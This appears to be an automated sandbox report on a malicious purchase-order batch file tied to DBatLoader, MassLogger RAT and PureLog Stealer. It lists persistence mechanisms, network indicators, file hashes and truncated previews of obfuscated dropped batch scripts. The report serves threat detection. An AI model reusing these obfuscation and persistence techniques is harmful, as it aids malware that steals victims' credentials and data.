                                                                                                      • HCA enabled
                                                                                                      • EGA enabled
                                                                                                      • AMSI enabled
                                                                                                      Analysis Mode:default
                                                                                                      Analysis stop reason:Timeout
                                                                                                      Sample name:PO#3_RKG367.bat
                                                                                                      Detection:MAL
                                                                                                      Classification:mal100.troj.spyw.evad.winBAT@42/20@3/3
                                                                                                      EGA Information:
                                                                                                      • Successful, ratio: 80%
                                                                                                      HCA Information:
                                                                                                      • Successful, ratio: 98%
                                                                                                      • Number of executed functions: 249
                                                                                                      • Number of non-executed functions: 67
                                                                                                      Cookbook Comments:
                                                                                                      • Found application associated with file extension: .bat
                                                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                      Warnings

                                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                      • Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.109.210.53
                                                                                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                      • Execution Graph export aborted for target Trading_AIBot.exe, PID 4064 because it is empty
                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 528 because it is empty
                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                      • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                      • VT rate limit hit for: PO#3_RKG367.bat

                                                                                                      Simulations

                                                                                                      Behavior and APIs

                                                                                                      TimeTypeDescription
                                                                                                      13:09:46API Interceptor2x Sleep call for process: x.exe modified
                                                                                                      13:09:59API Interceptor21x Sleep call for process: powershell.exe modified
                                                                                                      13:10:05API Interceptor4x Sleep call for process: Oupzhkpr.PIF modified
                                                                                                      13:10:20API Interceptor1x Sleep call for process: dllhost.exe modified
                                                                                                      13:10:43API Interceptor1971277x Sleep call for process: apihost.exe modified
                                                                                                      19:09:56AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Oupzhkpr C:\Users\Public\Oupzhkpr.url
                                                                                                      19:09:59Task SchedulerRun new task: AccSys path: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe
                                                                                                      19:10:05AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Oupzhkpr C:\Users\Public\Oupzhkpr.url
                                                                                                      19:10:20AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk

                                                                                                      Joe Sandbox View / Context

                                                                                                      IPs

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      41.185.8.252PO#5_Tower_049.batGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                        PO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                          PO_KB#67897.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                            PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                              158.101.44.242BgroUcYHpy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              FORTUNE RICH_PARTICULARS.pdf.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              fiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              PO#5_Tower_049.batGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              PO_4027_from_IC_Tech_Inc_6908.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              ZOYGRL1ePa.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              Ziraat_Bankasi_Swift_Mesaji_TXB04958T.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              Statement_3029_from_Cross_Traders_and_Logistics_ltd.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • checkip.dyndns.org/

                                                                                                              Domains

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              checkip.dyndns.comSOA NOV. Gateway Freight_MEDWA0577842.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 193.122.130.0
                                                                                                              dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 193.122.130.0
                                                                                                              #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 132.226.247.73
                                                                                                              fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 132.226.247.73
                                                                                                              fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 132.226.8.169
                                                                                                              1C24TDP_000000029.jseGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 132.226.247.73
                                                                                                              jqxrkk.ps1Get hashmaliciousMassLogger RATBrowse
                                                                                                              • 132.226.8.169
                                                                                                              Tepe - 20000000826476479.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 193.122.130.0
                                                                                                              Order_List.scr.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                              • 132.226.8.169
                                                                                                              Nuevo pedido.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 193.122.130.0
                                                                                                              reallyfreegeoip.orgSOA NOV. Gateway Freight_MEDWA0577842.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 104.21.64.1
                                                                                                              dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.96.1
                                                                                                              #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.96.1
                                                                                                              fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.64.1
                                                                                                              fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.112.1
                                                                                                              1C24TDP_000000029.jseGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 104.21.96.1
                                                                                                              jqxrkk.ps1Get hashmaliciousMassLogger RATBrowse
                                                                                                              • 104.21.16.1
                                                                                                              Tepe - 20000000826476479.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 104.21.16.1
                                                                                                              Order_List.scr.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                              • 104.21.64.1
                                                                                                              Nuevo pedido.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.16.1
                                                                                                              lwaziacademy.comPO#5_Tower_049.batGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                              • 41.185.8.252
                                                                                                              PO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                              • 41.185.8.252
                                                                                                              PO_KB#67897.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                              • 41.185.8.252
                                                                                                              PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                              • 41.185.8.252

                                                                                                              ASNs

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              CLOUDFLARENETUSSOA NOV. Gateway Freight_MEDWA0577842.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 104.21.64.1
                                                                                                              dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.96.1
                                                                                                              #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.96.1
                                                                                                              fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.64.1
                                                                                                              fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.112.1
                                                                                                              1C24TDP_000000029.jseGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 104.21.96.1
                                                                                                              jqxrkk.ps1Get hashmaliciousMassLogger RATBrowse
                                                                                                              • 104.21.16.1
                                                                                                              0V2JsCrGUB.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                              • 104.21.38.84
                                                                                                              https://boutiquedumonde.instawp.xyz/wp-content/themes/twentytwentyfive/envoidoclosa_toutdomaine/wetransfer/index.htmlGet hashmaliciousUnknownBrowse
                                                                                                              • 1.1.1.1
                                                                                                              drop1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                              • 172.67.74.152
                                                                                                              GridhostZAgarm7.elfGet hashmaliciousMiraiBrowse
                                                                                                              • 41.61.164.231
                                                                                                              goarm.elfGet hashmaliciousMiraiBrowse
                                                                                                              • 41.61.164.231
                                                                                                              3.elfGet hashmaliciousUnknownBrowse
                                                                                                              • 41.61.164.255
                                                                                                              1.elfGet hashmaliciousUnknownBrowse
                                                                                                              • 41.185.108.138
                                                                                                              2.elfGet hashmaliciousUnknownBrowse
                                                                                                              • 41.185.108.118
                                                                                                              PO#5_Tower_049.batGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                              • 41.185.8.252
                                                                                                              PO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                              • 41.185.8.252
                                                                                                              PO_KB#67897.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                              • 41.185.8.252
                                                                                                              armv4l.elfGet hashmaliciousMiraiBrowse
                                                                                                              • 41.61.6.129
                                                                                                              3.elfGet hashmaliciousUnknownBrowse
                                                                                                              • 41.185.108.101
                                                                                                              ORACLE-BMC-31898USSOA NOV. Gateway Freight_MEDWA0577842.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 193.122.130.0
                                                                                                              dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 193.122.130.0
                                                                                                              Tepe - 20000000826476479.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 193.122.130.0
                                                                                                              Nuevo pedido.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 193.122.130.0
                                                                                                              Payment 01.08.25.pdf.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                              • 193.122.6.168
                                                                                                              December Reconciliation QuanKang.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 193.122.6.168
                                                                                                              PO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 193.122.6.168
                                                                                                              BgroUcYHpy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 158.101.44.242
                                                                                                              VSLS SCHEDULE_pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 193.122.130.0
                                                                                                              ungziped_file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 193.122.130.0

                                                                                                              JA3 Fingerprints

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              54328bd36c14bd82ddaa0c04b25ed9adSOA NOV. Gateway Freight_MEDWA0577842.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 104.21.80.1
                                                                                                              dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.80.1
                                                                                                              #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.80.1
                                                                                                              fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.80.1
                                                                                                              fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.80.1
                                                                                                              1C24TDP_000000029.jseGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 104.21.80.1
                                                                                                              jqxrkk.ps1Get hashmaliciousMassLogger RATBrowse
                                                                                                              • 104.21.80.1
                                                                                                              Tepe - 20000000826476479.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 104.21.80.1
                                                                                                              Order_List.scr.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                              • 104.21.80.1
                                                                                                              Nuevo pedido.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.80.1
                                                                                                              a0e9f5d64349fb13191bc781f81f42e1Invoice.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 41.185.8.252
                                                                                                              24EPV9vjc5.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 41.185.8.252
                                                                                                              kXzODlqJak.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 41.185.8.252
                                                                                                              24EPV9vjc5.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 41.185.8.252
                                                                                                              kXzODlqJak.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 41.185.8.252
                                                                                                              cLm7ThwEvh.msiGet hashmaliciousUnknownBrowse
                                                                                                              • 41.185.8.252
                                                                                                              digitalisierungskonzept_muster.jsGet hashmaliciousUnknownBrowse
                                                                                                              • 41.185.8.252
                                                                                                              NvOxePa.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 41.185.8.252
                                                                                                              digitalisierungskonzept_muster.jsGet hashmaliciousUnknownBrowse
                                                                                                              • 41.185.8.252

                                                                                                              Dropped Files

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              C:\Users\Public\Libraries\rpkhzpuO.pifENQ-0092025.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                yxU3AgeVTi.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  ITT # KRPBV2663 .docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                    PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      PO#5_Tower_049.batGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                        HSBC_PAY.SCR.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                          PO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                            image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                              PO_KB#67897.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeGet hashmaliciousDBatLoader, FormBookBrowse

                                                                                                                                  Created / dropped Files

                                                                                                                                  C:\Users\Public\Libraries\FX.cmd

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                  File Type:DOS batch file, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):8556
                                                                                                                                  Entropy (8bit):4.623706637784657
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:dSSQx41VVrTlS2owuuWTtkY16Wdhdsu0mYKDCIfYaYuX1fcDuy:Vrhgwuua5vdnQaCIVJF6uy
                                                                                                                                  MD5:60CD0BE570DECD49E4798554639A05AE
                                                                                                                                  SHA1:BD7BED69D9AB9A20B5263D74921C453F38477BCB
                                                                                                                                  SHA-256:CA6A6C849496453990BECEEF8C192D90908C0C615FA0A1D01BCD464BAD6966A5
                                                                                                                                  SHA-512:AB3DBDB4ED95A0CB4072B23DD241149F48ECFF8A69F16D81648E825D9D81A55954E5DD9BC46D3D7408421DF30C901B9AD1385D1E70793FA8D715C86C9E800C57
                                                                                                                                  Malicious:true
                                                                                                                                  Preview:@echo off..set "MJtc=Iet "..@%.r.......%e%...%c%...r....%h%.....%o%........% % .....%o%...%f%.o.%f%......%..s%.......%e%.%t%.. .....% %.rr.. .%"%...%w%......%o%...o..%t%r.....%c%....%=%... . .%s%...... %e%....%t%....% %........ %"% o...%..%wotc%"%.%n% r .%O%...%P%.. ..%t%.%=%...... o..%=%......%"%....r...%..%wotc%"aeeYdDdanR%nOPt%s://"..%wotc%"%..........%a%.%e%......%e%.r..%Y%..%d%.....r....%D%.. %d% ... .%a%.. ...%n%.. ..%R%........%%nOPt%s%...... .%:%.. %/%....%/%r......%"%.....r.%..%wotc%"%...... ...%U%.o..%g%.r.%

                                                                                                                                  C:\Users\Public\Libraries\NEO.cmd

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                  File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (420), with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):46543
                                                                                                                                  Entropy (8bit):4.705001079878445
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:Ud6T6yIssKMyD/LgZ0+9Z2noufIBUEADZQp2H8ZLq:UdQFIssKMyjL4X2T8UbZT
                                                                                                                                  MD5:637A66953F03B084808934ED7DF7192F
                                                                                                                                  SHA1:D3AE40DFF4894972A141A631900BD3BB8C441696
                                                                                                                                  SHA-256:41E1F89A5F96F94C2C021FBC08EA1A10EA30DAEA62492F46A7F763385F95EC20
                                                                                                                                  SHA-512:2A0FEDD85722A2701D57AA751D5ACAA36BBD31778E5D2B51A5A1B21A687B9261F4685FD12E894244EA80B194C76E722B13433AD9B649625D2BC2DB4365991EA3
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:@echo off..set "EPD=sPDet "..@%...... or%e%.........%c%......%h%.........o%o%.or......% %.o.ro...%o%.%f%...r.....%f%....r....%..s%. %e%.....%t% % % rrr....%"%.....%E%....%J%.. ....%O%.%h% .......%=%........%s%.. ..%e%....%t%....% %...o...%"%.%..%EJOh%"%.%r% %H%..%C%........%N%....o ....%=%..........%=% .%"%..%..%EJOh%"%.....%K%.%z%..r%j%........%L%..%c%. o.......%f%. o..%x%.%X%.........r%V%.%J%.....%%rHCN%k%.... ...%"%........%..%EJOh%"%.o.....%a%or%g%..o.... ..%u% ..%P%.....o...%X%.. .......%c% .....%U%.%I%. .

                                                                                                                                  C:\Users\Public\Libraries\Oupzhkpr

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):679957
                                                                                                                                  Entropy (8bit):7.4483963454083435
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12288:2H+NXHhlVBcqgRbPaltoM6OwLovLA/eimwQUaq3cF2ez06hNg+Ymnch:2qHX8RbyfovtLovLA/eim/ccF2ez06hO
                                                                                                                                  MD5:25A482D7B6698E7666A523C910799F13
                                                                                                                                  SHA1:18B17A1E14069E747F5076F97A9654D8D99E5ADA
                                                                                                                                  SHA-256:4C1614F48CC1998B7E1F23C15AB0F0E2F4C9356EC05FF413FC5BE98D98EC8ACB
                                                                                                                                  SHA-512:5525D32CB43E6976D8F04EB60281DC7194E8FBC05D39098FD9EBA5E0BDD50C9246A5FA8A88A601940369A97589351F848AD0AB56D6B5B97470FCDBF076572AAE
                                                                                                                                  Malicious:true
                                                                                                                                  Preview:...8...*............................................................................................8...*9.............8...*............................................................................................................................................................................{.."..~.......{..........!.......#...............!.......}................... .(...{.'......|).%.... .........~.........$..|... ..%}.~.....................#|....{...{...........{....('..~.%....~.........}...|...............$...................$.....|{.$.~|.....|.|.......}$..... .|~.. ...'......$."~...#!...#........!..|...~...|.{....~|...... ........}......&.........~{.........&|... ............ ...!.......%...............}.....$..........{....|...........~%.....|...}...#..%.{....&.........(...{.....#!. .......|.....#....{...........................~%.................}}.......{......|...........).....|.|....%"...|........(..FFI.S.J.<.N.

                                                                                                                                  C:\Users\Public\Libraries\Oupzhkpr.PIF

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1317376
                                                                                                                                  Entropy (8bit):6.092693903786427
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:24576:hULl20LaVZ0emwYGqo1FJ89BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBx:hU1X1orJEBBBBBBBBBBBBBBBBBBBBBBB
                                                                                                                                  MD5:E337ECD5680D121D6DD649956DC716CA
                                                                                                                                  SHA1:198EAA7905760AA3FEE7D7329EC6354096C6BA63
                                                                                                                                  SHA-256:80AF0DDC803BB3CD14029CD9CEE39D81B15B21FC126912EFBDD7824BA740669B
                                                                                                                                  SHA-512:75783A2850F451E4733F7CFBBF1A9451041C040BB64B7DF7AA19ABE2FFFDDF45291C4706C5F606EE6AD168779B25C0D88DE2481FC563DAB1531BFD907CC20C92
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 47%
                                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................l.............@..............................................@..............................2%...........................P...a...........................@.......................................................text............................... ..`.itext.............................. ..`.data...............................@....bss.....6...............................idata..2%.......&..................@....tls....4....0...........................rdata.......@......................@..@.reloc...a...P...b..................@..B.rsrc................2..............@..@....................................@..@................................................................................................

                                                                                                                                  C:\Users\Public\Libraries\rpkhzpuO.pif

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):175800
                                                                                                                                  Entropy (8bit):6.631791793070417
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3072:qjyOm0e6/bIhbuwxlEb1MpG+xUEyAn0fYuDGOpPXFZ7on+gUxloDMq:qjyl6ebX45OG+xUEWfYUGOpPXFZ7on+G
                                                                                                                                  MD5:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                                  SHA1:2A001C30BA79A19CEAF6A09C3567C70311760AA4
                                                                                                                                  SHA-256:BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
                                                                                                                                  SHA-512:C7F5BAAD732424B975A426867D3D8B5424AA830AA172ED0FF0EF630070BF2B4213750E123A36D8C5A741E22D3999CA1D7E77C62D4B77D6295B20A38114B7843C
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                  Joe Sandbox View:
                                                                                                                                  • Filename: ENQ-0092025.doc, Detection: malicious, Browse
                                                                                                                                  • Filename: yxU3AgeVTi.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: ITT # KRPBV2663 .doc, Detection: malicious, Browse
                                                                                                                                  • Filename: PI ITS15235.doc, Detection: malicious, Browse
                                                                                                                                  • Filename: PO#5_Tower_049.bat, Detection: malicious, Browse
                                                                                                                                  • Filename: HSBC_PAY.SCR.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: PO_B2W984.com, Detection: malicious, Browse
                                                                                                                                  • Filename: image.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: PO_KB#67897.cmd, Detection: malicious, Browse
                                                                                                                                  • Filename: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, Detection: malicious, Browse
                                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....>.{..................................... ....@.......................... .......c........... ..............................................................H....................................................................................text............................... ..`.data........ ...P..................@....tls.................`..............@....rdata...............b..............@..P.idata... ...........d..............@..@.edata...............|..8...,...@...@..@

                                                                                                                                  C:\Users\Public\Oupzhkpr.url

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                  File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Oupzhkpr.PIF">), ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):104
                                                                                                                                  Entropy (8bit):5.187937555197363
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XM1N6XL3vsbxXPJovn:HRYFVmTWDyzKNafExXPmv
                                                                                                                                  MD5:73403ACC8CC138141FA79EAA29530668
                                                                                                                                  SHA1:B164AEFD4AFBEBD9A960949033EF213E034F4A5C
                                                                                                                                  SHA-256:AB7593E2C5D2D8EAC1B7418BCB695FC681B0B1DD1C4BF615B404BAADEE5D715F
                                                                                                                                  SHA-512:726F64F72074C2D50091D8DB28BB0941AFCE4E7750840291DC49312D82BA57B3D0D1DD58F19E9B7564433A314EE9A2315A1D82203D39FB63F78DDC4DE36BE7D1
                                                                                                                                  Malicious:true
                                                                                                                                  Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Oupzhkpr.PIF"..IconIndex=961278..HotKey=22..

                                                                                                                                  C:\Users\Public\OupzhkprF.cmd

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                  File Type:DOS batch file, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):15789
                                                                                                                                  Entropy (8bit):4.658965888116939
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:384:wleG1594aKczJRP1dADCDswtJPZ9KZVst1U:LA4aLz08JaJ
                                                                                                                                  MD5:CCE3C4AEE8C122DD8C44E64BD7884D83
                                                                                                                                  SHA1:C555C812A9145E2CBC66C7C64BA754B0C7528D6D
                                                                                                                                  SHA-256:4A12ABB62DD0E5E1391FD51B7448EF4B9DA3B3DC83FF02FB111E15D6A093B5E8
                                                                                                                                  SHA-512:EA23EDFB8E3CDA49B78623F6CD8D0294A4F4B9B11570E8478864EBDEE39FCC6B8175B52EB947ED904BE27B5AF2535B9CA08595814557AE569020861A133D827D
                                                                                                                                  Malicious:false
